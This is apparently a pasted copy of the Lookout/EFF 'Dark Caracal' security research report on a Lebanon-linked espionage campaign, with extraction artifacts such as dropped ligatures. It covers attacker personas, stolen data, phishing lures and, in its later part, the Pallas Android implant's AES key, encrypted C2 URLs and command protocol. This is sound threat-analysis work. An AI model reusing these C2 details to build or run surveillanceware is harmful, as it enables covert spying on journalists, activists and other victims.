· 8 years ago · Jan 19, 2018, 09:36 AM
1 SECURITY RESEARCH REPORT
2Dark Caracal Cyber-espionage at a Global Scale
31
4
5 Contents
6Executive Summary 1 Key Findings 2 Timeline 2
7Background 4 Lebanon’s General Directorate of General Security (GDGS) 4 Locating Attacker Facilities 5
8Test Devices 5 Wi-Fi Networks 5 Location Information from IP Addresses 6
9Identities: Attacker Personas 7 Nancy Razzouk and Hassan Ward 7 Hadi Mazeh 8 Rami Jabbour 8
10Proli c Activity 9 Ex ltrated Data 9 Android Malware Content 12 Windows Malware Content 15
11Patterns of Attacks 17 The Initial Compromise 17 Social Engineering and Spear-Phishing 19
12Surveillanceware — Mobile Capabilities 21 Pallas — Dark Caracal’s Custom Android Samples 21 C2 Communications with Malware Implants 23 Previous Use of FinFisher Spyware 30
13Surveillanceware — Desktop Components 31 Bandook 31 CrossRAT 34 Infected Documents 36 Other Samples 37
14Infrastructure 38 Primary Command and Control Server 39 Watering Hole Server 41 Phishing Domains 41 Windows C2 Servers 44
15Appendix 46 Indicators of Compromise and Actor Tracking 46 Mobile Implant Apps 47 Desktop Implant Apps 48
162
17
18 SECURITY RESEARCH REPORT
19 Executive Summary
20As the modern threat landscape has evolved, so have the actors. The barrier to entry for cyber-warfare has continued to decrease, which means new nation states — previously without signi cant offensive capabilities1 — are now able to build and deploy widespread multi-platform cyber-espionage campaigns.
21This report uncovers a proli c actor with nation-state level advanced persistent threat (APT) capabilities, who is exploiting targets globally across multiple platforms. The actor has been observed making use of desktop tooling, but has prioritized mobile devices as the primary attack vector. This is one of the rst publicly documented mobile APT actors known to execute espionage on a global scale.
22Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal2, a persistent and proli c actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of ex ltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identi able information. We are releasing more than 90 indicators of compromise (IOC) associated with Dark Caracal including 11 different Android malware IOCs; 26 desktop malware IOCs across Windows, Mac, and Linux; and 60 domain/IP based IOCs.
23Dark Caracal targets include individuals and entities that a nation state might typically attack, including governments, military targets, utilities, nancial institutions, manufacturing companies, and defense contractors. We speci cally uncovered data associated with military personnel, enterprises, medical professionals, activists, journalists, lawyers, and educational institutions during this investigation. Types of data include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data.
24The joint Lookout-EFF investigation began after EFF released its Operation Manul report, highlighting a multi-platform espionage campaign targeted at journalists, activists, lawyers, and dissidents who were critical of President Nursultan Nazarbayev’s regime in Kazakhstan. The report describes malware and tactics targeting desktop machines, with references to a possible Android component. After investigating related infrastructure and connections to Operation Manul, the team concluded that the same infrastructure is likely shared by multiple actors and is being used in a new set of campaigns.
25The diversity of seemingly unrelated campaigns that have been carried out from this infrastructure suggests it is being used simultaneously by multiple groups. Operation Manul clearly targeted persons of interest to Kazakhstan, while Dark Caracal has given no indication of an interest in these targets or their associates. This suggests that Dark Caracal either uses or manages the infrastructure found to be hosting a number of widespread, global cyber-espionage campaigns.
26Since 2007, Lookout has investigated and tracked mobile security events across hundreds of millions of devices around the world. This mobile espionage campaign is one of the most proli c we have seen to date. Additionally, we have reason to believe the activity Lookout and EFF have directly observed represents only a small fraction of the cyber-espionage that has been conducted using this infrastructure.
271 https://www.checkpoint.com/downloads/volatile-cedar-technical-report.pdf
282 In keeping with traditional APT naming, we chose the name “Caracal†(pronounced [kar-uh-kal]) because the feline is native to Lebanon and because this group has remained hidden for so long. From the Wikipedia entry “the caracal is highly secretive and dif cult to observe†and “is often confused with [other breeds of cat].†The naming further builds on EFF’s “Operation Manul,†another feline reference. We like cats.
291
30
31 Key Findings
32Lookout and EFF researchers have identi ed a new threat actor, Dark Caracal.
33• Our research shows that Dark Caracal may be administering its tooling out of the headquarters of the General Directorate of General Security (GDGS) in Beirut, Lebanon.
34• The GDGS gathers intelligence for national security purposes and for its offensive cyber capabilities according to previous reports.
35• We have identi ed four Dark Caracal personas with overlapping TTP (tools, techniques, and procedures).
36• Dark Caracal is using the same infrastructure as was previously seen in the Operation Manul campaign, which targeted journalists, lawyers, and dissidents critical of the government of Kazakhstan.
37Dark Caracal has been conducting a multi-platform, APT-level surveillance operation targeting individuals and institutions globally.
38• Dark Caracal has successfully run numerous campaigns in parallel and we know that the data we have observed is only a small fraction of the total activity.
39• We have identi ed hundreds of gigabytes of data ex ltrated from thousands of victims, spanning 21+ countries in North America, Europe, the Middle East, and Asia.
40• The mobile component of this APT is one of the rst we’ve seen executing espionage on a global scale.
41• Analysis shows Dark Caracal successfully compromised the devices of military personnel, enterprises, medical professionals, activists, journalists, lawyers, and educational institutions.
42• Dark Caracal targets also include governments, militaries, utilities, nancial institutions, manufacturing companies, and defense contractors.
43• Types of ex ltrated data include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data.
44SECURITY RESEARCH REPORT
45 Dark Caracal Activity Timeline
46 Jan. 2012
47Nov. 2012 Mar. 2014
48Nov. 2014
49Dec. 2015
50Jun. 2015
51Jun. 2016
52Aug. 2016
53Oct. 2016
54Dec. 2016
55Dec. 2016
56First mobile surveillance campaign, oldb, launched
57op13@mail[.]com registers phishing domain arablivenews[.]com
58Custom FinFisher mobile sample created
59arablivenews[.]com expires and is decommissioned
60op13@mail[.]com registers arabpublisherslb[.]com domain
61Operation Manul phishing emails rst seen
62gmailservices[.]org and twiterservices[.]org WHOIS details registered as Hadi Mazeh and op13@mail[.]com
63EFF releases “Operation Manul†report
64op13@mail[.]com registered arablivenews[.]com. Threat Connect report3 suggests
65domain may be related to “APT 28â€
66secureandroid[.]info watering hole goes live.
67Second mobile surveillance campaign, wp7, launched
68 3 “https://www.threatconnect.com/blog/how-to-investigate-incidents-in-threatconnect/†2
69
70 • Dark Caracal follows the typical attack chain for cyber-espionage. They rely primarily on social media, phishing, and in some cases physical access to compromise target systems, devices, and accounts.
71Dark Caracal uses tools across mobile and desktop platforms.
72• Dark Caracal uses mobile as a primary attack platform.
73• Dark Caracal purchases or borrows mobile and desktop tools from
74actors on the dark web.
75• Lookout discovered Dark Caracal’s custom-developed mobile surveillanceware (that we call Pallas) in May 2017. Pallas is found in trojanized Android apps.
76• Dark Caracal has also used FinFisher, a tool created by a “lawful intercept†company that is regularly abused by other nation-state actors.
77• Dark Caracal makes extensive use of Windows malware called Bandook RAT. Dark Caracal also uses a previously unknown, multi- platform tool that Lookout and EFF have named CrossRAT, which is able to target Windows, OSX, and Linux.
78Dark Caracal uses a constantly evolving, global infrastructure.
79• Lookout and EFF researchers have identi ed parts of Dark Caracal’s infrastructure, providing us with unique insight into its global operations.
80• The infrastructure operators prefer to use Windows and XAMPP software on their C2 servers rather than a traditional LAMP stack, which provides a unique ngerprint when searching for related infrastructure.
81• Lookout and EFF have identi ed infrastructure shared by Operation Manul and Dark Caracal as well as other actors.
82• Attributing Dark Caracal was dif cult as the actor employs multiple types of malware, and our analysis suggests the infrastructure is also being used by other groups.
83Lookout and EFF are releasing more than 90 indicators of compromise (IOC):
84• 11 Android malware IOCs
85• 26 desktop malware IOCs
86• 60 domains, IP Addresses, and WHOIS information
87SECURITY RESEARCH REPORT
88 Dark Caracal Activity Timeline (cont.)
89 Mar. 2017
90Apr. 2017
91Jun. 2017
92Jul. 2017 Jul. 2017
93Jul. 2017 Aug. 2017
94Aug. 2017
95Aug. 2017 Sep. 2017 Sep. 2017
96Dec. 2017
97Jan. 2018
98Third mobile surveillance campaign, wp8, launched
99Fourth mobile surveillance campaign, wp9, launched
100Fifth and sixth mobile surveillance campaigns, wp10 and wp10s, launched
101wp8 campaign ceases collecting data
102adobeair[.]net taken down for several dayss
103adobeair[.]net resumes operations
104wp9, wp10, and wp10s campaigns cease collecting data
105adobeair[.]net WHOIS details changed to Nancy Razzouk, op13@mail[.]com, Lebanon
106oldb campaign ceases collecting data wp7 campaign ceases collecting data
107adobeair[.]net changes hosting and is secured against data leaks
108Secureanroid[.]info’s domain name expires
109Dark Caracal made public
110 3
111
112 SECURITY RESEARCH REPORT
113 Background
114Lebanon’s General Directorate of General Security (GDGS)
115Devices for testing and operating the campaign were traced back to a building belonging to the Lebanese General Directorate of General Security (GDGS), one of Lebanon’s intelligence agencies. Based on the available evidence, it is likely that the GDGS is associated with or directly supporting the actors behind Dark Caracal.
116Previous Cyberespionage
117EFF rst identi ed elements of this infrastructure in its August 20164 report on Operation Manul. The report details a series of attacks targeting journalists and political activists critical of Kazakhstan’s authoritarian government, along with their family members, lawyers, and associates. EFF’s research noted references to Android components found on the infrastructure; however, no samples had been discovered at the time of the report’s release. Lookout has since acquired Android samples used by Dark Caracal that belong to what Lookout researchers have named the Pallas malware family.
118Citizen Lab previously agged the General Directorate of General Security in a 2015 report as one of two Lebanese government organizations using the FinFisher spyware5. The report cites evidence showing that the GDGS, along with other state actors around the world, had active campaigns using FinFisher infrastructure and tools. However, the report did not specify whether the spyware used was the mobile version of FinFisher. Our investigation resulted in the discovery of at least one FinFisher implant for Android, which corroborates Citizen Lab’s previous research. The sample’s hash is provided in the appendix of this report. We also uncovered new desktop surveillance software developed potentially by Dark Caracal themselves, a developer associated with the GDGS, or a private contractor group.
119The intent of bringing forth these ndings is to reveal newly discovered evidence of a new nation-state actor compromising the devices of military personnel, enterprises, medical professionals, activists, journalists, lawyers, and educational institutions. Our review and disclosure of this matter follows industry practices, including sharing our ndings with appropriate government authorities, industry partners and the public at large.
1204 https://www.eff.org/ les/2016/08/03/i-got-a-letter-from-the-government.pdf 5 https://citizenlab.ca/2015/10/mapping- n shers-continuing-proliferation/
121 4
122
123 SECURITY RESEARCH REPORT
124 Locating Attacker Facilities
125We correlated information from test devices and Wi-Fi networks to determine the location of Dark Caracal’s facilities.
126Test Devices
127Dark Caracal used a series of test devices to con rm that its malware implants and C2 infrastructure work correctly. Identifying these devices helped us to determine Dark Caracal’s likely location inside the GDGS building.
128Distinguishing between test and target devices can be tricky. After analyzing data from the infrastructure, we noticed that a subset of the compromised devices contained similar email, Viber, Primo, Telegram, and Whatsapp accounts. These data points allowed us to focus on a select few devices that were unique among the thousands we saw. Additionally, these devices contained a minimal amount of (if any) real content in the ex ltrated text messages, contacts, and application data, which led us to conclude they were likely test devices.
129Wi-Fi Networks
130Figure 1: A picture of the GDGS building in Beirut, Lebanon from where we have located Dark Caracal operating
131 Within the cluster of test devices we noticed what could be unique Wi-Fi networks. Knowing that Wi-Fi networks can be used for location positioning, we used that data to geo-locate where these devices may have been by keying off network identi ers. We speci cally focused on the Wi-Fi network SSID Bld3F6. Using the Wi-Fi geolocation service Wigle.net we saw these test device Wi-Fi networks mapped to Beirut. We also noticed Wi-Fi networks with SSID Bld3F6 mapped near the General Security building in Beirut, Lebanon.
132Figure 2: Google map of the GDGS Building in Beirut
133Left: Data as observed from Wigle.net for SSID: Bld3F6 | Right: Data con rming location of SSID: Bld3F6
134 5
135
136 SECURITY RESEARCH REPORT
137 Location Information from IP Addresses
138Throughout the course of this investigation we observed logins into the administrative console of the C2 server come from three IP addresses. The IP addresses are all from Ogero Telecom6, which is owned by the Government of Lebanon. We geo-located two of the IP addresses just south of the GDGS’s building (probably a switching or central hub for Ogero).
139Figure 3: The location of IP addresses that logged into the adobeair[.]net admin console between July and September 2017
140 6 https://en.wikipedia.org/wiki/Telecommunications_in_Lebanon
1416
142
143 SECURITY RESEARCH REPORT
144 Identities: Attacker Personas
145The infrastructure used by Dark Caracal revealed several different associated personas. This resulted in the team linking four different aliases, two domains, and two phone numbers to this infrastructure. At the center of these personas is the email address op13@mail[.]com which has appeared at various stages in the historical WHOIS information of Dark Caracal domains (see: Timeline).
146Aliases associated with op13@mail[.]com include Nancy Razzouk, Hadi Mazeh, and Rami Jabbour. All of the physical addresses listed in the WHOIS domain registrations associated with op13@mail[.]com tend to cluster around the SSID: Bld3F6 Wi-Fi locations. This is near the General Security building in Beirut.
147Nancy Razzouk and Hassan Ward
148We identi ed Nancy Razzouk listed alongside the op13@mail[.]com email address in domain WHOIS information. We also found this name in signer content for the Windows malware7 that communicates with adobeair[.]net.
149 Figure 4: Signer content for Windows malware
150The contact details for Nancy present in WHOIS information matched the public listing for a Beirut-based individual by that name. When we looked at the phone number associated with Nancy in the WHOIS information, we discovered the same number listed in ex ltrated content and being used by an individual with the name Hassan Ward.
1517 SHA-256 HASH: d57701321f2f13585a02fc8ba6cbf1f2f094764bfa067eb73c0101060289b0ba
1527
153
154 SECURITY RESEARCH REPORT
155 Hadi Mazeh
156During July 2017, Dark Caracal’s internet service provider took the adobeair[.]net command and control server of ine. Within
157a matter of days, we observed it being re-registered to the email address op13@mail[.]com with the name Nancy Razzouk. This allowed us to identify several other domains listed under the same WHOIS email address information, running similar server components. The WHOIS name eld, however, listed several entries with the name Hadi Mazeh. This suggests that either multiple individuals are using the op13 email address or the owner has several aliases that he or she uses with it.
158 op13@mail.com
159fbarticles.com Hadi Mazeh arabpublisherslb.com
160gmailservices.org facebookservices.org twiterservices.org
161 Figure 5: Aliases associated with the op13 email address Rami Jabbour
162We determined the actor behind the op13 email address also registered the domain arablivenews[.]com and provided the name Rami Jabbour. Address details listed in WHOIS information for this speci c entry are Salameh Blg, Museum Str, and Mathaf, which appears to be in close proximity to where we have seen test devices in Beirut.
1638
164
165 SECURITY RESEARCH REPORT
166 Proli c Activity
167Throughout this investigation, Lookout and EFF researchers have gained unique insight into the global operations of Dark Caracal. This has primarily been possible due to command and control infrastructure operators allowing public access to data stolen from compromised devices and systems.
168Since we rst gained visibility into attacker infrastructure in July 2017, we have seen millions of requests being made to it from infected devices. This demonstrates that Dark Caracal is likely running upwards of six distinct campaigns in parallel, some of which have been operational since January 2012.
169Dark Caracal targets a broad range of victims. Thus far, we have identi ed members of the military, government of cials, medical practitioners, education professionals, academics, civilians from numerous other elds, and commercial enterprises as targets.
170Ex ltrated Data
171 SMS Messages
172Call Records
173Contacts Images
174* * * * *
175Account Information
176Bookmarks & Browsing History
177Installed Applications
178Audio Recordings
179Wi-Fi Details
180WhatsApp, Telegram and Skype databases
181Legal and Corporate Documentation
182File and Directory Listings
183 Figure 6: A summary of some of the types of content Dark Caracal ex ltrated from victims on both Android and Windows
184Not only was Dark Caracal able to cast its net wide, it was also able to gain deep insight into each of the victim’s lives. It did this through a series of multi-platform surveillance campaigns that began with desktop attacks and pivoted to the mobile device. Stolen data was found to include personal messages and photos as well as corporate and legal documentation. In some cases, screenshots from its Windows malware painted a picture of how a particular individual spent his evenings at home.
1859
186
187 We found the largest collection of data from a single command and control server that operated under the domain adobeair[.] net. Over a short period of observation, devices from at least six distinct Android campaigns communicated with this domain resulting in 48GB of information being ex ltrated from compromised devices. Windows campaigns contributed a further 33GB of stolen data. The remainder of the data contained desktop malware samples, spreadsheet reports on victims, and other les.
188Figure 7: Split of ex ltrated data found on just the command and control server adobeair[.]net. From 81GB of stolen data, the majority was found to be from campaigns run against mobile devices
189Split of exfiltrated content on adobeair.net
19081 GB
19159.3%
192Android Campaigns
19340.7%
194Windows Campaigns
195China
196Nepal
197France
198Netherlands
199Germany
200Pakistan
201India
202Philippines
203Italy
204Qatar
205Jordan
206Russia
207Lebanon
208Saudi Arabia
209South Korea
210Switzerland
211Syria
212Thailand
213United States
214Venezuela
215Vietnam
21681GB
217Victims were found to speak a variety of languages and were also from a wide range of countries. We discovered messages and photos in Arabic, English, Hindi, Turkish, Thai, Portuguese, and Spanish in the examined data. According to our analysis, infrastructure contained ex ltrated data from individuals residing in:
218SECURITY RESEARCH REPORT
21910
220
221 SECURITY RESEARCH REPORT
222 Figure 8: Observed locations of compromised devices
223Based on both the mobile and desktop campaigns we observed, we believe the attacker rst ex ltrated information in January 2012. At the time of writing this report, it looks as though Dark Caracal is still uploading data from its spy campaigns, according to the servers we are tracking.8
224 Figure 9: Amount of ex ltrated content (as represented by “count†in the graph above) being uploaded for certain campaigns on adobeair[.]net over time for 2017
2258 Despite the internet service provider taking the command and control server down in July 2017, the infrastructure reappeared online again after a few days. The dip in data ex ltration due to the takedown can be observed in Figure 9 at the beginning of August. The average number of les uploaded to the server increases steadily with time.
22611
227
228 SECURITY RESEARCH REPORT
229 Android Malware Content
230The Android malware family mainly trojanizes messaging and security applications and, once it compromises a device, it is capable of collecting a range of sensitive user information. This includes recorded audio, call logs, conversations from popular chat applications, location information, browsing history, device speci c metadata, contacts, and much more.
231Each Android malware sample contains a hard coded identi er that we believe represents the campaign to which it belongs. When a Dark Caracal operator instructs an infected device to upload sensitive data, it is stored on the attacker infrastructure under this campaign. While investigating this adversary, we observed content distributed across six different campaigns. In this report, we refer to these campaigns by the name of the directory to which infected devices uploaded victim data. These campaigns are listed below, along with the number of victim devices we believe Dark Caracal compromised while we were observing its operations:
232• /oldb - 28 perceived test devices, 454 potential victim devices
233• /wp7 - 4 perceived test devices, 117 potential victim devices
234• /wp8 - 1 perceived test device, 4 potential victim devices
235• /wp9 - 11 potential victim devices
236• /wp10 - 1 potential test device, 2 potential victim devices
237• /wp10s - 13 potential test devices, 21 potential victim devices
238We did not attempt to identify targets and consider that beyond the scope of this report.
239 An overview of ex ltrated data from the Android campaigns can be seen in the gure below.
240264,535
241Files
24217.6%
243206,461
244Unique Wi-Fi SSIDs 13.8%
245***** 1547
246Authentication Accounts
2470.1%
24892,35
249Browsing History URLs 6.2%
25045,264
251Android Application Details
2523.0%
253486,766
254SMS Texts 32.4%
255 46
256Directories
2570.0%
258 252,982
259Contacts 16.9%
260 150,266
261Call Records 10.0%
262 Figure 10: Distribution of data from the Android campaigns
26312
264
265 SECURITY RESEARCH REPORT
266 Ex ltrated data can be divided into the following categories of information:
267• SMS messages - SMS messages made up some of the more meaningful ex ltrated data. Messages included personal texts, two-factor authentication and one-time password pins, receipts and airline reservations, and company communications. Some pin codes were within their validity window at the time of writing this report.
268Figure 11: Ex ltrated SMS texts detailing OTPs, receipts, and Facebook noti cations
269 13
270
271 • Contact Lists - This data included numbers, names, addresses, bank passcodes, PIN numbers, how many times each contact was dialed, and the last time the contact was called.
272Figure 12: Contacts ex ltrated from 3 victims’ Android devices can be seen to contain corporate numbers, personal numbers, and Visa credit card numbers
273• Call logs - This data included a full record of incoming, outgoing, and missed calls along with the date and duration
274of the conversation.
275• Installed Applications - This data included app names and version numbers.
276• Bookmarks and Browsing History - This data included bookmarks and browsing history from web pages. This data was seen in only one Android campaign called oldb, but it clearly identi ed victims that were active in political discourse.
277• Connected Wi-Fi Details - This data included observed Wi-Fi access point names, BSSIDs, and signal point strength.
278• Authentication Accounts - This data included the login credentials and which applications are using it.
279• File and Directory Listings - This data included a list of personal les, downloaded les, and temporary les, including those used by other applications.
280• Audio Recordings and Audio Messages - This data included audio recordings of conversations, some of which identi ed individuals by name.
281• Photos - This data included all personal and downloaded photographs, including pro le pictures.
282SECURITY RESEARCH REPORT
283 14
284
285 SECURITY RESEARCH REPORT
286 Windows Malware Content
287Dark Caracal’s use of Windows malware includes a wider range of command and control infrastructure beyond adobeair[.]net. Its methods and data collection, however, are similar to the Android malware.
288Ex ltrated data from the Windows malware included the following general categories:
289• Desktop Screenshots - This data included full screenshots taken at regular intervals and uploaded to adobeair[.]net. By observing these images, it is disturbingly simple to watch a victim go about his daily life and follow that individual every step of the way.
290 Figure 13: A screenshot ex ltrated from victim’s Windows device on adobeair[.]net
291• Skype Logs Databases - The data included the entire Skype AppData folder for certain victims, including messaging
292databases.
293• Photos - This data included complete contents of the ‘Pictures’ folder from compromised Windows machines. It is common to see smartphone photos backed up to this location, which most often contains personal photographs of family and friends taken by the individual being targeted.
29415
295
296 SECURITY RESEARCH REPORT
297 • iPhone Backups - This data included an entire unencrypted backup of a victim’s iPhone.
298• File Listings - This data included all default Windows folders and le listings.
299• Corporate and Legal Documentation - This data included a large collection of company-speci c documents. Speci cally, we discovered these on another live command and control server, planethdx[.]com.
300 Figure 14: An example of corporate documentation, which details the addresses and telephone numbers of customers for a shipping company
30116
302
303 SECURITY RESEARCH REPORT
304 Patterns of Attacks
305Dark Caracal follows the typical attack chain for client-side cyber-espionage. Mobile tools include a custom written Android surveillanceware implant Lookout named Pallas9 and a previously unknown FinFisher sample. The group’s desktop tools include the Bandook malware family and a newly discovered desktop surveillanceware tool that we have named CrossRAT, which is able to infect Windows, Linux, and OS X operating systems.
306The Initial Compromise
307 Physical access
308Phishing messages
309WhatsApp
310 Watering hole server: secureandroid[.]info
311 Dark Caracal relies primarily on social engineering via posts on a Facebook group and WhatsApp messages in order to compromise target systems, devices, and accounts. At a high-level, the attackers have designed three different kinds of phishing messages, the goal of which is to eventually drive victims to a watering hole controlled by Dark Caracal.
3129 Pallas’ Cat is another name for “Manul,†a reference to EFF’s Op Manul campaign on this actor
31317
314Exfiltrated Data
315Phishing messages
316Facebook group
317 Phishing server:
318Set up for credential harvesting
319Fake Google domain Fake Facebook domain Fake Twitter domain
320 Trojanized Android Apps
321 C2 server
322adobeair[.]net
323Figure 15: The Android malware infrastructure is designed to attract victims into the campaign through two different mechanisms: phishing campaigns that separately lead to a watering hole server (secureandroid[.]info) and a server designed to accept credentials via a spoofed login
324
325 The group distributes trojanized Android applications with the Pallas malware through its watering hole, secureandroid[.]info. Many of these downloads include fake messaging and privacy- oriented apps.
326SECURITY RESEARCH REPORT
327 There is also some indication that Dark Caracal has used physical access in the past to install the Android malware.
328Figure 16: secureandroid[.]info’s app download page
329 Figure 17: A text message found from a possible victim’s device
33018
331
332 Social Engineering and Spear-Phishing
333Dark Caracal uses phishing messages through popular applications, such as WhatsApp, in order to direct people to the watering hole.
334Figure 18:
335Left: Extracted from WhatsApp messages database
336Right: Facebook group links to watering hole
337Dark Caracal infrastructure hosts phishing sites, which look like login portals for well known services, such as Facebook, Twitter, and Google. We found links to these pages in numerous Facebook groups that included “Nanys†in their titles. These groups are listed in the appendix.
338Figure 19: Dark Caracal credential phishing portals
339SECURITY RESEARCH REPORT
340 19
341
342 SECURITY RESEARCH REPORT
343 Google has indexed several of these phishing campaigns from the tweetsfb[.]com server. We were able to link a number of phishing domains dating to the mid-to-late 2016 time period from this data. We believe the attackers used these phishing servers to capture login credentials, hijack accounts, and to push out more spoofed messages to widen their pool of victims.
344Figure 20: Google indexing of tweetsfb[.]com campaigns
345Phishing links posted in Dark Caracal linked Facebook groups include politically themed news stories, links to fake versions of
346popular services, such as Gmail, and links to trojanized versions of WhatsApp.
347 Figure 21: Dark Caracal phishing links posted on Facebook
34820
349
350 Four Facebook pro les similar in theme “liked†the phishing groups. Dark Caracal likely used these fake pro les to initiate communication with victims and build a rapport before directing them either to content on the “Nanys†Facebook groups or to the secureandroid[.]info domain directly.
351Figure 22: Dark Caracal fake Facebook pro les
352Surveillanceware — Mobile Capabilities Pallas — Dark Caracal’s Custom Android Samples
353Using our global sensor network, Lookout researchers identi ed 11 unique Android surveillanceware apps tied to the Operation Manul campaign10. The trojanized apps still retain the legitimate functionality of the apps they spoof and behave as intended. The apps are found predominantly in trojanized versions of well-known secure messaging apps including:
354• Signal (org.thoughtcrime.securesms)
355• Threema (ch.threema.app)
356• Primo (com.primo.mobile.android.app)
357• WhatsApp (com.gbwhatsapp)
358• Plus Messenger (org.telegram.plus)
359We also identi ed Pallas in trojanized versions of two apps aimed at users seeking to protect themselves and their data online:
360• Psiphon VPN (com.psiphon3)
361SECURITY RESEARCH REPORT
362 • Orbot: TOR Proxy (org.torproject.android)
36310 http://www.cmcm.com/blog/en/security/2017-08-16/1101.html
36421
365
366 Finally, with help from Google’s Android Security team, we discovered Pallas lurking in several apps purporting to be Adobe Flash Player and Google Play Push for Android:
367• Flash Player (com. ashplayer.player)
368• Google Play Push (com. ashplayer.player)
369Figure 23: Dark Caracal trojanized Android apps
370Neither the desktop nor the mobile malware tooling use zero day vulnerabilities. Pallas samples primarily rely on the permissions granted at installation in order to access sensitive user data. However, there is functionality that allows an attacker to instruct an infected device to download and install additional applications or updates. Theoretically this means it’s possible for the operators behind Pallas to push speci c exploit modules to compromised devices in order to gain complete access.
371We found no attacker infrastructure containing rooting packages. This highlights that, in many cases, advanced exploitation capabilities like those shown by surveillance tools such as Pegasus for iOS and Chrysaor for Android (that targeted both Android11 and iOS12 devices), are not essential, but helpful when targeting certain platforms.
37211 https://blog.lookout.com/pegasus-android 12 https://blog.lookout.com/trident-pegasus
373SECURITY RESEARCH REPORT
374 Primo
375Threema
376Psiphon
377Signal
378 Orbot TOR Proxy
379WhatsApp
380Plus Messenger
38122
382
383 • Take photos with front or back camera
384• Ex ltrate all text messages including those
385received in the future
386• Retrieve latitude / longitude from GPS
387• Silently activate the device microphone to capture audio
388• Retrieve contacts
389• Scan nearby Wi-Fi access points and ex ltrate information about them, including their BSSID, SSID, authentication, key management, encryption schemes, signal strength, and frequency
390• Retrieve chat content from secure messaging applications (this only applies when a victim is using a secure messaging app that has been trojanized with Pallas)
391C2 Communications with Malware Implants
392• Retrieve device metadata
393• Retrieve text messages
394• Retrieve information about all accounts
395• Send an SMS to an attacker-speci ed number
396• Retrieve call logs
397• Retrieve messages and any corresponding decryption keys from messaging apps
398• Retrieve a list of installed packages
399• Download and install additional apps
400• Upload attacker speci ed les
401• Delete attacker speci ed les and directories • Harvest credentials via phishing pop-ups
402All samples belonging to the Pallas malware family have the same capabilities and functionality described in the previous section. However, obfuscation did differ between them. For reference, code snippets shown in the following section have been taken from a trojanized version of WhatsApp with a package name of com.gbwhatsapp and a SHA1 hash of ed4754effda466b8babf87bcba2717760f112455.
403Like most other surveillanceware, communication with the C2 includes three main phases:
4041. Regular beaconing to the remote HTTP server.
4052. Handling any outstanding attacker speci ed commands. 3. Ex ltration / uploading of victim data to C2 servers.
406Pallas samples have a number of different entry points via broadcast receivers, speci cally the C2 communications reside in the com.receive.MySe.
407SECURITY RESEARCH REPORT
408 The Pallas rst stage is capable of performing the following surveillance functionality on a compromised device:
40923
410
411 SECURITY RESEARCH REPORT
412 Figure 24: Actions that trigger the Pallas malware samples to do work
413In all Pallas samples Lookout analyzed, domain information and URL paths are hardcoded as encrypted values. The actor uses AES encryption and chose to use the secret key of Bar12345Bar12345 and initialization vector of RandomInitVector, which appears in a post describing how to use AES encryption in Java13.
414Examples of AES encrypted, base64 encoded domains and URL paths present in some Pallas samples include: • krgbAdOUCGKEnuCRp5s+eE2eMWUktZQR64RBdkNoH/O0NFo9ByRTFhjqa2UX2Y9k
415• krgbAdOUCGKEnuCRp5s+eA/hX2erfMp+49exa+8zoZgMlBICjGuOSqrvGRCjgrZ4
416These two examples decrypt to:
417• https://adobeair[.]net/wp9/add.php
418• https://adobeair[.]net/wp9/upload.php
419The general format of Pallas requests can be written as https://adobeair[.]net/<campaign_identi er>/<add.php or upload.php>.
420The add.php script is used for several operations, including compromised device check-ins as well as C2 instruction execution. We also determined that it is able to retrieve location information (GPS data) and general metadata about a victim’s device. The following table provides additional details around the structure of these requests. In all cases, the Content-Type header is set to application/x-www-form-urlencoded. The listed ac parameter identi es the type of request made to the C2.
42113 https://stackover ow.com/questions/15554296/simple-java-aes-encrypt-decrypt-example
42224
423
424 SECURITY RESEARCH REPORT
425 Description
426 Purpose
427Of The Request
428 HTTP Parameters(Key=Value) Required
429 Retrieve data from a compromised device, including text messages, calls, contact information, Wi-Fi details, and accounts.
430Parameter pr is “1†if suf cient permissions exist, “0†otherwise, and “111111111111â€, if the build version of the device is lower than 23.
431 Check-In with C2
432 ac=chkcm1 uid=<device_id> pr=<app_has_permisions>
433 The victim’s GPS location is communicated to the C2 every 120 minutes.
434 GPS location
435 ac=chkcm1 uid=<device_id> alt=<Latitude> long=<Longtitude>
436 Request responsible for gathering general device metadata and uploading to C2. This request is triggered via several entry points including, but not limited to, the creation of the app on the device.
437 General Device Information
438 ac=iu
439uid=<DeviceID> imei=<DeviceID>
440nb=<None> os=<ReleaseBuildVersion> man=<ManufacturerModel> op=<NetworkOperatorName> wi =<IsConnectedToNetwork> cam=†<NumberOfCameras> ver=<versionOftheApp> pr=<permisionsGranted> idt=<CurrentDate> ecr=<ExistAcall_record>
441 Responses from C2 infrastructure to devices infected with Pallas consist of chunks of data separated by a “~!â€. The following table shows the commands that are currently supported. Some of these require the victim’s device to report back to the C2 and/or upload les to it via HTTP POST requests. The responses to the attacker commands detailed below are handled via the add.php page.
44225
443
444 SECURITY RESEARCH REPORT
445 Description
446 C2 Command
447 HTTP Parameters(Key=Value) Required
448 Retrieve all the data from a compromised device, including text message, call information, contact details, Wi-Fi data, and account information to name a few.
449 GALL1
450 Toggle the call record functionality to on or off.
451 REC2
452 Upload le and directory access logs of the trojanized application to the C2 via a single le.
453 GFILE1
454 Take a picture using the front or rear camera and upload to the C2 server.
455 CAMG1
456 Download an update from attacker infrastructure, attempt to execute it, and notify the C2.
457 UPD1
458 ac=REPX
459uid=<Device_ID>
460RP=Update Procedure Executed
461 Delete an attacker-speci ed le from the device and notify the C2.
462 DELF1
463 ac=REPX
464uid=<Device_ID>
465RP=File Deleted : < le_name>
466 Retrieve an attacker-speci ed le from a compromised device, uploading it to the C2.
467 UPF1
468 Download an attacker-speci ed le to the target device and notify the C2.
469 DWN1
470 ac=REPX
471uid=<Device_ID>
472RP=File Uploaded To Target : < le_name>
473 Record an MPEG4 audio le (.mp4) for an attacker-speci ed duration. Audio is captured with the device’s microphone, and once complete is uploaded to the C2 server.
474 REC1
475 ac=REPX
476uid=<Device_ID>
477RP=Microphone Already in use by another app
478 Performs the same functionality as detailed above for the REC1 command with the exception that the le is stored locally on external storage under the path .Temp/srec
479 SMS1
480 ac=REPX
481uid=<Device_ID>
482RP=Microphone Already in use by another app
483 Send a text message to an attacker-speci ed number.
484 SMS1
485 ac=REPX
486uid=<Device_ID>
487RP=SMS sent to<destinationAddress>
